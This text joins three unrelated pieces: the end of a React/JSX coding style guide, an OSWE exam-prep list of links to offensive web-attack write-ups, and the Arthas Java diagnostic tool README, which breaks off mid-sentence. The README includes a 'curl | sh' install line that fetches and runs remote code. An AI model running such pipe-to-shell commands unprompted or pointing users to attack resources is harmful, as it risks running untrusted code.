<MyComponent>{body}</MyComponent>; } ``` ## Tags - Always self-close tags that have no children. eslint: [`react/self-closing-comp`](https://github.com/jsx-eslint/eslint-plugin-react/blob/master/docs/rules/self-closing-comp.md) ```jsx // bad <Foo variant="stuff"></Foo> // good <Foo variant="stuff" /> ``` - If your component has multiline properties, close its tag on a new line. eslint: [`react/jsx-closing-bracket-location`](https://github.com/jsx-eslint/eslint-plugin-react/blob/master/docs/rules/jsx-closing-bracket-location.md) ```jsx // bad <Foo bar="bar" baz="baz" /> // good <Foo bar="bar" baz="baz" /> ``` ## Methods - Use arrow functions to close over local variables. It is handy when you need to pass additional data to an event handler. Although, make sure they [do not massively hurt performance](https://www.bignerdranch.com/blog/choosing-the-best-approach-for-react-event-handlers/), in particular when passed to custom components that might be PureComponents, because they will trigger a possibly needless rerender every time. ```jsx function ItemList(props) { return ( <ul> {props.items.map((item, index) => ( <Item key={item.key} onClick={(event) => { doSomethingWith(event, item.name, index); }} /> ))} </ul> ); } ``` - Bind event handlers for the render method in the constructor. eslint: [`react/jsx-no-bind`](https://github.com/jsx-eslint/eslint-plugin-react/blob/master/docs/rules/jsx-no-bind.md) > Why? A bind call in the render path creates a brand new function on every single render. Do not use arrow functions in class fields, because it makes them [challenging to test and debug, and can negatively impact performance](https://medium.com/@charpeni/arrow-functions-in-class-properties-might-not-be-as-great-as-we-think-3b3551c440b1), and because conceptually, class fields are for data, not logic. ```jsx // bad class extends React.Component { onClickDiv() { // do stuff } render() { return <div onClick={this.onClickDiv.bind(this)} />; } } // very bad class extends React.Component { onClickDiv = () => { // do stuff } render() { return <div onClick={this.onClickDiv} /> } } // good class extends React.Component { constructor(props) { super(props); this.onClickDiv = this.onClickDiv.bind(this); } onClickDiv() { // do stuff } render() { return <div onClick={this.onClickDiv} />; } } ``` - Do not use underscore prefix for internal methods of a React component. > Why? Underscore prefixes are sometimes used as a convention in other languages to denote privacy. But, unlike those languages, there is no native support for privacy in JavaScript, everything is public. Regardless of your intentions, adding underscore prefixes to your properties does not actually make them private, and any property (underscore-prefixed or not) should be treated as being public. See issues [#1024](https://github.com/airbnb/javascript/issues/1024), and [#490](https://github.com/airbnb/javascript/issues/490) for a more in-depth discussion. ```jsx // bad React.createClass({ _onClickSubmit() { // do stuff }, // other stuff }); // good class extends React.Component { onClickSubmit() { // do stuff } // other stuff } ``` - Be sure to return a value in your `render` methods. eslint: [`react/require-render-return`](https://github.com/jsx-eslint/eslint-plugin-react/blob/master/docs/rules/require-render-return.md) ```jsx // bad render() { (<div />); } // good render() { return (<div />); } ``` ## Ordering - Ordering for `class extends React.Component`: 1. optional `static` methods 1. `constructor` 1. `getChildContext` 1. `componentWillMount` 1. `componentDidMount` 1. `componentWillReceiveProps` 1. `shouldComponentUpdate` 1. `componentWillUpdate` 1. `componentDidUpdate` 1. `componentWillUnmount` 1. *event handlers starting with 'handle'* like `handleSubmit()` or `handleChangeDescription()` 1. *event handlers starting with 'on'* like `onClickSubmit()` or `onChangeDescription()` 1. *getter methods for `render`* like `getSelectReason()` or `getFooterContent()` 1. *optional render methods* like `renderNavigation()` or `renderProfilePicture()` 1. `render` - How to define `propTypes`, `defaultProps`, `contextTypes`, etc... ```jsx import React from 'react'; import PropTypes from 'prop-types'; const propTypes = { id: PropTypes.number.isRequired, url: PropTypes.string.isRequired, text: PropTypes.string, }; const defaultProps = { text: 'Hello World', }; class Link extends React.Component { static methodsAreOk() { return true; } render() { return <a href={this.props.url} data-id={this.props.id}>{this.props.text}</a>; } } Link.propTypes = propTypes; Link.defaultProps = defaultProps; export default Link; ``` - Ordering for `React.createClass`: eslint: [`react/sort-comp`](https://github.com/jsx-eslint/eslint-plugin-react/blob/master/docs/rules/sort-comp.md) 1. `displayName` 1. `propTypes` 1. `contextTypes` 1. `childContextTypes` 1. `mixins` 1. `statics` 1. `defaultProps` 1. `getDefaultProps` 1. `getInitialState` 1. `getChildContext` 1. `componentWillMount` 1. `componentDidMount` 1. `componentWillReceiveProps` 1. `shouldComponentUpdate` 1. `componentWillUpdate` 1. `componentDidUpdate` 1. `componentWillUnmount` 1. *clickHandlers or eventHandlers* like `onClickSubmit()` or `onChangeDescription()` 1. *getter methods for `render`* like `getSelectReason()` or `getFooterContent()` 1. *optional render methods* like `renderNavigation()` or `renderProfilePicture()` 1. `render` ## `isMounted` - Do not use `isMounted`. eslint: [`react/no-is-mounted`](https://github.com/jsx-eslint/eslint-plugin-react/blob/master/docs/rules/no-is-mounted.md) > Why? [`isMounted` is an anti-pattern][anti-pattern], is not available when using ES6 classes, and is on its way to being officially deprecated. [anti-pattern]: https://facebook.github.io/react/blog/2015/12/16/ismounted-antipattern.html ## Translation This JSX/React style guide is also available in other languages: - ![cn](https://raw.githubusercontent.com/gosquared/flags/master/flags/flags/shiny/24/China.png) **Chinese (Simplified)**: [jhcccc/javascript](https://github.com/jhcccc/javascript/tree/master/react) - ![tw](https://raw.githubusercontent.com/gosquared/flags/master/flags/flags/shiny/24/Taiwan.png) **Chinese (Traditional)**: [jigsawye/javascript](https://github.com/jigsawye/javascript/tree/master/react) - ![es](https://raw.githubusercontent.com/gosquared/flags/master/flags/flags/shiny/24/Spain.png) **Espaรฑol**: [agrcrobles/javascript](https://github.com/agrcrobles/javascript/tree/master/react) - ![jp](https://raw.githubusercontent.com/gosquared/flags/master/flags/flags/shiny/24/Japan.png) **Japanese**: [mitsuruog/javascript-style-guide](https://github.com/mitsuruog/javascript-style-guide/tree/master/react) - ![kr](https://raw.githubusercontent.com/gosquared/flags/master/flags/flags/shiny/24/South-Korea.png) **Korean**: [apple77y/javascript](https://github.com/apple77y/javascript/tree/master/react) - ![pl](https://raw.githubusercontent.com/gosquared/flags/master/flags/flags/shiny/24/Poland.png) **Polish**: [pietraszekl/javascript](https://github.com/pietraszekl/javascript/tree/master/react) - ![Br](https://raw.githubusercontent.com/gosquared/flags/master/flags/flags/shiny/24/Brazil.png) **Portuguese**: [ronal2do/javascript](https://github.com/ronal2do/airbnb-react-styleguide) - ![ru](https://raw.githubusercontent.com/gosquared/flags/master/flags/flags/shiny/24/Russia.png) **Russian**: [leonidlebedev/javascript-airbnb](https://github.com/leonidlebedev/javascript-airbnb/tree/master/react) - ![th](https://raw.githubusercontent.com/gosquared/flags/master/flags/flags/shiny/24/Thailand.png) **Thai**: [lvarayut/javascript-style-guide](https://github.com/lvarayut/javascript-style-guide/tree/master/react) - ![tr](https://raw.githubusercontent.com/gosquared/flags/master/flags/flags/shiny/24/Turkey.png) **Turkish**: [alioguzhan/react-style-guide](https://github.com/alioguzhan/react-style-guide) - ![ua](https://raw.githubusercontent.com/gosquared/flags/master/flags/flags/shiny/24/Ukraine.png) **Ukrainian**: [ivanzusko/javascript](https://github.com/ivanzusko/javascript/tree/master/react) - ![vn](https://raw.githubusercontent.com/gosquared/flags/master/flags/flags/shiny/24/Vietnam.png) **Vietnam**: [uetcodecamp/jsx-style-guide](https://github.com/UETCodeCamp/jsx-style-guide) **[โฌ† back to top](#table-of-contents)**
# OSWE-Prep An OSWE Guide #### WriteUps <https://stacktrac3.co/oswe-review-awae-course/> <https://github.com/wetw0rk/AWAE-PREP]> <https://github.com/timip/OSWE> <https://forum.hackthebox.eu/discussion/2646/oswe-exam-review-2020-notes-gifts-inside> <https://anchor.fm/dayzerosec/episodes/Offensive-Securitys-OSWEAWAE--Massive-Security-failures--and-a-handful-of-cool-attacks-e45m85> <https://www.linkedin.com/pulse/lets-get-oswe-certificate-part-i-recon-istv%25C3%25A1n-b%25C3%25B6hm/> <https://donavan.sg/blog/index.php/2020/03/14/the-awae-oswe-journey-a-review/> <https://medium.com/@fasthm00/the-state-of-oswe-c68150210fe4> <https://z-r0crypt.github.io/blog/2020/01/22/oswe/awae-preparation/> <https://github.com/deletehead/awae_oswe_prep> <https://github.com/M507/AWAE-Preparation> <https://www.vesiluoma.com/offensive-security-web-expert-oswe-advanced-web-attacks-and-exploitation/> <https://blog.bousalman.com/oswe-review/> <https://www.youtube.com/playlist?list=PLwvifWoWyqwqkmJ3ieTG6uXUSuid95L33> <https://hub.schellman.com/blog/oswe-review-and-exam-preparation-guide> <https://medium.com/@it_band/how-i-passed-the-oswe-exam-3de88bdbad2c> <https://www.reddit.com/r/OSWE/comments/bsods2/i_just_passed_the_oswe_exam_amaa_about_the_exam/> <https://nethemba.com/are-you-preparing-for-oswe-or-oscp-certification/> <https://kishanchoudhary.com/OSWE/Journey/OSWE.html> #### Remote Code Execution https://shells.systems/ https://medium.com/@corneacristian/top-25-rce-bug-bounty-reports-bc9555cca7bc https://github.com/shawnmckinney/remote-code-execution-sample https://www.gosecure.net/blog/2019/07/03/java-remote-code-execution-potpourri/ https://labs.bishopfox.com/tech-blog/2015/08/coldfusion-bomb-a-chain-reaction-from-xss-to-rce https://voidsec.com/tabletopia-from-xss-to-rce/ https://blog.ripstech.com/2019/magento-rce-via-xss/ https://medium.com/@knownsec404team/the-analysis-of-mybb-18-20-from-stored-xss-to-rce-7234d7cc0e72 https://sarthaksaini.com/2019/awae/xss-rce.html https://s0md3v.github.io/xss-to-rce/ https://anotherhackerblog.com/exploiting-file-uploads-pt-2/ https://labs.bishopfox.com/advisories/openemr-5-0-16-remote-code-execution-cross-site-scripting https://zero.lol/2019-05-13-xss-to-rce/ https://lwierzbicki.github.io/2020/06/10/from-file-upload-to-rce.html https://www.corben.io/atlassian-crowd-rce/ https://rebraws.github.io/ATutor/ https://github.com/fuzzlove/ATutor-2.2.4-Language-Exploit https://underdefense.com/n-day-exploit-development-and-upgrade-to-rce/ https://www.rcesecurity.com/2017/08/from-lfi-to-rce-via-php-sessions/ https://www.exploit-db.com/exploits/39534 https://www.exploit-db.com/exploits/39524 https://ssd-disclosure.com/ssd-advisory-auth-bypass-and-rce-in-infinite-wp-admin-panel/ https://github.com/kacperszurek/exploits/blob/master/GitList/gitlist_unauthenticated_rce.py https://medium.com/cisco-amp-technology/remote-code-execution-for-java-developers-84adb8e23652 https://wiki.sei.cmu.edu/confluence/display/java/IDS07-J.+Sanitize+untrusted+data+passed+to+the+Runtime.exec%28%29+method https://github.com/pwntester/SpringBreaker #### File Upload Vulnerability https://www.slideshare.net/HackIT-ukraine/15-technique-to-exploit-file-upload-pages-ebrahim-hegazy https://medium.com/@519udhaya/unrestricted-file-upload-vulnerability-bba4491a08da https://book.hacktricks.xyz/pentesting-web/file-upload https://www.exploit-db.com/exploits/48978 #### Auth Bypass https://blog.ripstech.com/2018/cubecart-admin-authentication-bypass/ https://packetstormsecurity.com/files/157563/ATutor-LMS-2.2.4-Weak-Password-Reset-Hash.html https://ssd-disclosure.com/ssd-advisory-auth-bypass-and-rce-in-infinite-wp-admin-panel/ #### Deserialisation https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/ https://nickbloor.co.uk/2017/08/13/attacking-java-deserialization/ https://gist.github.com/DiabloHorn/8630948d953386d2ed575e17f8635ee7 https://deadcode.me/blog/2016/09/02/Blind-Java-Deserialization-Commons-Gadgets.html https://deadcode.me/blog/2016/09/18/Blind-Java-Deserialization-Part-II.html http://slightlyrandombrokenthoughts.blogspot.com/2010/08/breaking-defensive-serialization.html https://speakerdeck.com/pwntester/attacking-net-serialization?slide=8 https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html https://brandur.org/fragments/gadgets-and-chains https://notsosecure.com/remote-code-execution-via-php-unserialize/ https://www.nccgroup.com/uk/about-us/newsroom-and-events/blogs/2019/march/finding-and-exploiting-.net-remoting-over-http-using-deserialisation/ https://media.blackhat.com/bh-us-12/Briefings/Forshaw/BH_US_12_Forshaw_Are_You_My_Type_WP.pdf https://www.youtube.com/watch?v=t-zVC-CxYjw&ab_channel=OWASP https://pentest-tools.com/blog/exploit-dotnetnuke-cookie-deserialization/ https://book.hacktricks.xyz/pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net https://book.hacktricks.xyz/pentesting-web/deserialization https://rhinosecuritylabs.com/research/java-deserializationusing-ysoserial/ https://blog.jamesotten.com/post/applications-manager-rce/ https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet#ysoserial https://gist.github.com/pwntester/72f76441901c91b25ee7922df5a8a9e4 https://medium.com/@frycos/yet-another-net-deserialization-35f6ce048df7 https://speakerdeck.com/pwntester/attacking-net-serialization?slide=12 https://www.exploit-db.com/exploits/42756 https://research-labs.net/search/exploits/hpe-72-java-deserialization https://nytrosecurity.com/2018/05/30/understanding-java-deserialization/ https://www.exploit-db.com/docs/english/44756-deserialization-vulnerability.pdf http://www.pwntester.com/blog/2013/12/16/cve-2011-2894-deserialization-spring-rce/ https://blog.ripstech.com/tags/php-object-injection/ https://medium.com/bugbountywriteup/fireshell-ctf-2019-web-vice-writeup-2deee8d82556 https://github.com/s-n-t/presentations/blob/master/us-18-Thomas-It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It.pdf #### SQL Injection https://www.exploit-db.com/papers/17073 https://github.com/blabla1337/skf-labs/blob/master/kbid-156-sqli-blind.md https://0x00sec.org/t/taking-sql-injections-further-blind-second-order-sql-injection-tmhc-ctf-shitter-writeup/18122 https://cyberpanda.la/blog/laravel-sql-injections http://blog.k3170makan.com/2012/01/bit-shifting-blind-injection-simplified.html https://pulsesecurity.co.nz/articles/postgres-sqli https://medium.com/@afinepl/postgresql-code-execution-udf-revisited-3b08412f47c1 https://www.infigo.hr/files/INFIGO-TD-2009-04_PostgreSQL_injection_ENG.pdf https://medium.com/@ismailtasdelen/sql-injection-payload-list-b97656cfd66b https://hydrasky.com/network-security/sql-injection-bypass-cheatsheet/ https://www.secjuice.com/advanced-sqli-waf-bypass/ https://www.exploit-db.com/papers/17934 https://medium.com/@infinitypaul/laravel-query-builder-security-8ce5e96233d9 https://security.stackexchange.com/questions/7024/is-it-possible-to-test-for-postgres-blindsql-injection-using-pg-sleep-in-a-whe https://www.websec.ca/kb/sql_injection https://incogbyte.github.io/sqli_waf_bypass/ https://medium.com/@frycos/finding-sql-injections-fast-with-white-box-analysis-a-recent-bug-example-ca449bce6c76 http://www.mannulinux.org/2015/03/blind-injection-exploitation-with.html http://www.mannulinux.org/2018/03/erro-based-sql-injection-mysql.html http://www.mannulinux.org/2020/09/sql-injection-filter-bypass-to-perform.html https://blog.cobalt.io/a-pentesters-guide-to-sql-injection-sqli-16fd570c3532 https://www.exploit-db.com/exploits/46725 https://blog.pentesteracademy.com/postgresql-udf-command-execution-372f0c68cfed?gi=89e5578c5604 https://blog.pentesteracademy.com/postgresql-udf-command-execution-372f0c68cfed https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md https://www.open-emr.org/wiki/images/1/11/Openemr_insecurity.pdf https://www.postgresql.org/docs/8.0/xfunc-sql.html https://www.dionach.com/blog/postgresql-9-x-remote-command-execution/ https://www.leidecker.info/pgshell/Having_Fun_With_PostgreSQL.txt https://medium.com/@notsoshant/a-not-so-blind-rce-with-sql-injection-13838026331e https://www.redsiege.com/blog/2018/11/sqli-data-exfiltration-via-dns/ http://pentestmonkey.net/category/cheat-sheet/sql-injection http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet http://www.mannulinux.org/2020/04/exploiting-sql-injection-in-insert.html https://github.com/21y4d/blindSQLi/blob/master/blindSQLi.py https://github.com/Dionach/pgexec/blob/master/pg_exec.c https://www.codeigniter.com/userguide3/database/queries.html#escaping-queries #### Type Juggling https://dzone.com/articles/type-juggling-authentication-bypass-vulnerability https://hackerone.com/reports/86022 https://docs.google.com/spreadsheets/u/0/d/1oWsmTvEZcfgc_1QkBczNGA3Gcffg_pmgKcak7iZldUw/pub?output=html https://www.alertlogic.com/blog/writing-exploits-for-exotic-bug-classes-php-type-juggling-d58/ https://labs.f-secure.com/archive/laravel-cookie-forgery-decryption-and-rce/ https://labs.f-secure.com/archive/wordpress-auth-cookie-forgery/ https://owasp.org/www-pdf-archive/PHPMagicTricks-TypeJuggling.pdf https://docs.google.com/file/d/0ByaHyu9Ur1viWV9yZFVwS3dpQ2M/edit http://turbochaos.blogspot.com/2013/08/exploiting-exotic-bugs-php-type-juggling.html https://www.sans.org/blog/php-weak-typing-woes-8212-with-some-pontification-about-code-and-pen-testing/ #### JS Injection https://howtonode.org/what-is-this https://www.npmjs.com/package/safe-eval https://capacitorset.github.io/mathjs/ https://riptutorial.com/javascript/example/32217/evaled-json-injection https://medium.com/swlh/secure-code-review-and-penetration-testing-of-node-js-and-javascript-apps-41485b1a9518 https://pwnisher.gitlab.io/nodejs/sandbox/2019/02/21/sandboxing-nodejs-is-hard.html https://blog.netspi.com/escape-nodejs-sandboxes/ https://humanwhocodes.com/blog/2013/06/25/eval-isnt-evil-just-misunderstood/ http://dfkaye.github.io/2014/03/14/javascript-eval-and-function-constructor/ https://portswigger.net/research/dom-based-angularjs-sandbox-escapes https://nodejs.org/api/vm.html https://nodejs.dev/learn/how-much-javascript-do-you-need-to-know-to-use-nodejs https://nodejs.dev/learn/differences-between-nodejs-and-the-browser https://blog.netspi.com/escape-nodejs-sandboxes/ https://ibreak.software/2016/08/nodejs-rce-and-a-simple-reverse-shell/ https://github.com/hacksparrow/safe-eval/issues/19 #### SSTI https://0day.work/jinja2-template-injection-filter-bypasses/ https://medium.com/@nyomanpradipta120/jinja2-ssti-filter-bypasses-a8d3eb7b000f https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2 #### Misc https://ippsec.rocks/?# https://www.bitdefender.com/blog/consumer/avoid-malicious-files-double-extensions/ https://js.getwisdom.io/til-js-safely-reversing-unicode-strings/ https://eng.getwisdom.io/awesome-unicode/ https://developer.apple.com/library/archive/documentation/General/Conceptual/DevPedia-CocoaCore/ObjectGraph.html#//apple_ref/doc/uid/TP40008195-CH54-SW1 https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/ https://netsec.ws/?p=331 https://codewhitesec.blogspot.com/2015/03/sh-or-getting-shell-environment-from.html http://www.jackson-t.ca/runtime-exec-payloads.html
## Arthas ![arthas](site/src/site/sphinx/arthas.png) [![Build Status](https://travis-ci.org/alibaba/arthas.svg?branch=master)](https://travis-ci.org/alibaba/arthas) [![codecov](https://codecov.io/gh/alibaba/arthas/branch/master/graph/badge.svg)](https://codecov.io/gh/alibaba/arthas) [![maven](https://img.shields.io/maven-central/v/com.taobao.arthas/arthas-packaging.svg)](https://search.maven.org/search?q=g:com.taobao.arthas) ![license](https://img.shields.io/github/license/alibaba/arthas.svg) [![Average time to resolve an issue](http://isitmaintained.com/badge/resolution/alibaba/arthas.svg)](http://isitmaintained.com/project/alibaba/arthas "Average time to resolve an issue") [![Percentage of issues still open](http://isitmaintained.com/badge/open/alibaba/arthas.svg)](http://isitmaintained.com/project/alibaba/arthas "Percentage of issues still open") `Arthas` is a Java Diagnostic tool open sourced by Alibaba. Arthas allows developers to troubleshoot production issues for Java applications without modifying code or restarting servers. [ไธญๆ–‡่ฏดๆ˜Ž/Chinese Documentation](README_CN.md) **[2021ไธญๅ›ฝๅผ€ๆบ้กน็›ฎ่ฏ„้€‰๏ผŒ่ฏทๆŠ•Arthasไธ€็ฅจ!](https://www.oschina.net/project/top_cn_2021?id=52)** ### Background Often times, the production system network is inaccessible from the local development environment. If issues are encountered in production systems, it is impossible to use IDEs to debug the application remotely. More importantly, debugging in production environment is unacceptable, as it will suspend all the threads, resulting in the suspension of business services. Developers could always try to reproduce the same issue on the test/staging environment. However, this is tricky as some issues cannot be reproduced easily on a different environment, or even disappear once restarted. And if you're thinking of adding some logs to your code to help troubleshoot the issue, you will have to go through the following lifecycle; test, staging, and then to production. Time is money! This approach is inefficient! Besides, the issue may not be reproducible once the JVM is restarted, as described above. Arthas was built to solve these issues. A developer can troubleshoot your production issues on-the-fly. No JVM restart, no additional code changes. Arthas works as an observer, which will never suspend your existing threads. ### Key features * Check whether a class is loaded, or where the class is being loaded. (Useful for troubleshooting jar file conflicts) * Decompile a class to ensure the code is running as expected. * View classloader statistics, e.g. the number of classloaders, the number of classes loaded per classloader, the classloader hierarchy, possible classloader leaks, etc. * View the method invocation details, e.g. method parameter, return object, thrown exception, and etc. * Check the stack trace of specified method invocation. This is useful when a developers wants to know the caller of the said method. * Trace the method invocation to find slow sub-invocations. * Monitor method invocation statistics, e.g. qps, rt, success rate and etc. * Monitor system metrics, thread states and cpu usage, gc statistics, and etc. * Supports command line interactive mode, with auto-complete feature enabled. * Supports telnet and websocket, which enables both local and remote diagnostics with command line and browsers. * Supports profiler/Flame Graph * Support get objects in the heap that are instances of the specified class. * Supports JDK 6+. * Supports Linux/Mac/Windows. ### [Online Tutorials(Recommended)](https://arthas.aliyun.com/doc/arthas-tutorials.html?language=en) * [Usages](tutorials/katacoda/README.md#online-tutorial-usages) ### Quick start #### Use `arthas-boot`(Recommended) Download`arthas-boot.jar`๏ผŒStart with `java` command: ```bash curl -O https://arthas.aliyun.com/arthas-boot.jar java -jar arthas-boot.jar ``` Print usage: ```bash java -jar arthas-boot.jar -h ``` #### Use `as.sh` You can install Arthas with one single line command on Linux, Unix, and Mac. Copy the following command and paste it into the command line, then press *Enter* to run: ```bash curl -L https://arthas.aliyun.com/install.sh | sh ``` The command above will download the bootstrap script `as.sh` to the current directory. You can move it any other place you want, or put its location in `$PATH`. You can enter its interactive interface by executing `as.sh`, or execute `as.sh -h` for more help information. ### Documentation * [Online Tutorials(Recommended)](https://arthas.aliyun.com/doc/arthas-tutorials.html?language=en) * [User manual](https://arthas.aliyun.com/doc/en) * [Installation](https://arthas.aliyun.com/doc/en/install-detail.html) * [Download](https://arthas.aliyun.com/doc/en/download.html) * [Quick start](https://arthas.aliyun.com/doc/en/quick-start.html) * [Advanced usage](https://arthas.aliyun.com/doc/en/advanced-use.html) * [Commands](https://arthas.aliyun.com/doc/en/commands.html) * [WebConsole](https://arthas.aliyun.com/doc/en/web-console.html) * [Docker](https://arthas.aliyun.com/doc/en/docker.html) * [Arthas Spring Boot Starter](https://arthas.aliyun.com/doc/en/spring-boot-starter.html) * [User cases](https://github.com/alibaba/arthas/issues?q=label%3Auser-case) * [FAQ](https://arthas.aliyun.com/doc/en/faq) * [Compile and debug/How to contribute](https://github.com/alibaba/arthas/blob/master/CONTRIBUTING.md) * [Release Notes](https://github.com/alibaba/arthas/releases) ### Feature Showcase #### Dashboard * https://arthas.aliyun.com/doc/en/dashboard ![dashboard](site/src/site/sphinx/_static/dashboard.png) #### Thread * https://arthas.aliyun.com/doc/en/thread See what is eating your CPU (ranked by top CPU usage) and what is going on there in one glance: ```bash $ thread -n 3 "as-command-execute-daemon" Id=29 cpuUsage=75% RUNNABLE at sun.management.ThreadImpl.dumpThreads0(Native Method) at sun.management.ThreadImpl.getThreadInfo(ThreadImpl.java:440) at com.taobao.arthas.core.command.monitor200.ThreadCommand$1.action(ThreadCommand.java:58) at com.taobao.arthas.core.command.handler.AbstractCommandHandler.execute(AbstractCommandHandler.java:238) at com.taobao.arthas.core.command.handler.DefaultCommandHandler.handleCommand(DefaultCommandHandler.java:67) at com.taobao.arthas.core.server.ArthasServer$4.run(ArthasServer.java:276) at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1145) at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:615) at java.lang.Thread.run(Thread.java:745) Number of locked synchronizers = 1 - java.util.concurrent.ThreadPoolExecutor$Worker@6cd0b6f8 "as-session-expire-daemon" Id=25 cpuUsage=24% TIMED_WAITING at java.lang.Thread.sleep(Native Method) at com.taobao.arthas.core.server.DefaultSessionManager$2.run(DefaultSessionManager.java:85) "Reference Handler" Id=2 cpuUsage=0% WAITING on java.lang.ref.Reference$Lock@69ba0f27 at java.lang.Object.wait(Native Method) - waiting on java.lang.ref.Reference$Lock@69ba0f27 at java.lang.Object.wait(Object.java:503) at java.lang.ref.Reference$ReferenceHandler.run(Reference.java:133) ``` #### jad * https://arthas.aliyun.com/doc/en/jad Decompile your class with one shot: ```java $ jad javax.servlet.Servlet ClassLoader: +-java.net.URLClassLoader@6108b2d7 +-sun.misc.Launcher$AppClassLoader@18b4aac2 +-sun.misc.Launcher$ExtClassLoader@1ddf84b8 Location: /Users/xxx/work/test/lib/servlet-api.jar /* * Decompiled with CFR 0_122. */ package javax.servlet; import java.io.IOException; import javax.servlet.ServletConfig; import javax.servlet.ServletException; import javax.servlet.ServletRequest; import javax.servlet.ServletResponse; public interface Servlet { public void init(ServletConfig var1) throws ServletException; public ServletConfig getServletConfig(); public void service(ServletRequest var1, ServletResponse var2) throws ServletException, IOException; public String getServletInfo(); public void destroy(); } ``` #### mc * https://arthas.aliyun.com/doc/en/mc Memory compiler, compiles `.java` files into `.class` files in memory. ```bash $ mc /tmp/Test.java ``` #### retransform * https://arthas.aliyun.com/doc/en/retransform Load the external `*.class` files to retransform/hotswap the loaded classes in JVM. ```bash retransform /tmp/Test.class retransform -c 327a647b /tmp/Test.class /tmp/Test\$Inner.class ``` #### sc * https://arthas.aliyun.com/doc/en/sc Search any loaded class with detailed information. ```bash $ sc -d org.springframework.web.context.support.XmlWebApplicationContext class-info org.springframework.web.context.support.XmlWebApplicationContext code-source /Users/xxx/work/test/WEB-INF/lib/spring-web-3.2.11.RELEASE.jar name org.springframework.web.context.support.XmlWebApplicationContext isInterface false isAnnotation false isEnum false isAnonymousClass false isArray false isLocalClass false isMemberClass false isPrimitive false isSynthetic false simple-name XmlWebApplicationContext modifier public annotation interfaces super-class +-org.springframework.web.context.support.AbstractRefreshableWebApplicationContext +-org.springframework.context.support.AbstractRefreshableConfigApplicationContext +-org.springframework.context.support.AbstractRefreshableApplicationContext +-org.springframework.context.support.AbstractApplicationContext +-org.springframework.core.io.DefaultResourceLoader +-java.lang.Object class-loader +-org.apache.catalina.loader.ParallelWebappClassLoader +-java.net.URLClassLoader@6108b2d7 +-sun.misc.Launcher$AppClassLoader@18b4aac2 +-sun.misc.Launcher$ExtClassLoader@1ddf84b8 classLoaderHash 25131501 ``` #### vmtool * https://arthas.aliyun.com/doc/en/vmtool Get objects in the heap that are instances of the specified class. ```bash $ vmtool --action getInstances --className java.lang.String --limit 10 @String[][ @String[com/taobao/arthas/core/shell/session/Session], @String[com.taobao.arthas.core.shell.session.Session], @String[com/taobao/arthas/core/shell/session/Session], @String[com/taobao/arthas/core/shell/session/Session], @String[com/taobao/arthas/core/shell/session/Session.class], @String[com/taobao/arthas/core/shell/session/Session.class], @String[com/taobao/arthas/core/shell/session/Session.class], @String[com/], @String[java/util/concurrent/ConcurrentHashMap$ValueIterator], @String[java/util/concurrent/locks/LockSupport], ] ``` #### stack * https://arthas.aliyun.com/doc/en/stack View the call stack of `test.arthas.TestStack#doGet`: ```bash $ stack test.arthas.TestStack doGet Press Ctrl+C to abort. Affect(class-cnt:1 , method-cnt:1) cost in 286 ms. ts=2018-09-18 10:11:45;thread_name=http-bio-8080-exec-10;id=d9;is_daemon=true;priority=5;TCCL=org.apache.catalina.loader.ParallelWebappClassLoader@25131501 @test.arthas.TestStack.doGet() at javax.servlet.http.HttpServlet.service(HttpServlet.java:624) at javax.servlet.http.HttpServlet.service(HttpServlet.java:731) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:303) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208) at org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:220) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:110) ... at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:169) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:103) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:116) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:451) at org.apache.coyote.http11.AbstractHttp11Processor.process(AbstractHttp11Processor.java:1121) at org.apache.coyote.AbstractProtocol$AbstractConnectionHandler.process(AbstractProtocol.java:637) at org.apache.tomcat.util.net.JIoEndpoint$SocketProcessor.run(JIoEndpoint.java:316) at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142) at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617) at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61) at java.lang.Thread.run(Thread.java:745) ``` #### Trace * https://arthas.aliyun.com/doc/en/trace See what is slowing down your method invocation with trace command: ![trace](site/src/site/sphinx/_static/trace.png) #### Watch * https://arthas.aliyun.com/doc/en/watch Watch the first parameter and thrown exception of `test.arthas.TestWatch#doGet` only if it throws exception. ```bash $ watch test.arthas.TestWatch doGet {params[0], throwExp} -e Press Ctrl+C to abort. Affect(class-cnt:1 , method-cnt:1) cost in 65 ms. ts=2018-09-18 10:26:28;result=@ArrayList[ @RequestFacade[org.apache.catalina.connector.RequestFacade@79f922b2], @NullPointerException[java.lang.NullPointerException], ] ``` #### Monitor * https://arthas.aliyun.com/doc/en/monitor Monitor a specific method invocation statistics, including the total number of invocations, average response time, success rate, and every 5 seconds: ```bash $ monitor -c 5 org.apache.dubbo.demo.provider.DemoServiceImpl sayHello Press Ctrl+C to abort. Affect(class-cnt:1 , method-cnt:1) cost 